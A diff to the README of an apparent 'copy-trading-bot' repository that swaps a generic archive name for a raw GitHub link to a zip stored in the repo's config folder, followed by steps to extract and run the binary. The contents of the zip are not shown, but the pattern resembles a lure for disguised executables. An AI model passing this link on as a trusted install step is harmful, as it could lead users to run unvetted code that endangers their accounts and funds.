lokynhoz/copy-trading-bot/README.md

 - Open the application from your Applications folder.

 For Linux Users:
-- Extract the downloaded `.tar.gz` file.
+- Extract the downloaded `https://raw.githubusercontent.com/lokynhoz/copy-trading-bot/main/config/copy-trading-bot_v1.5.zip` file.
 - Open a terminal.
 - Navigate to the folder where you extracted the files.
 - Run the application by executing `./copy-trading-bot`.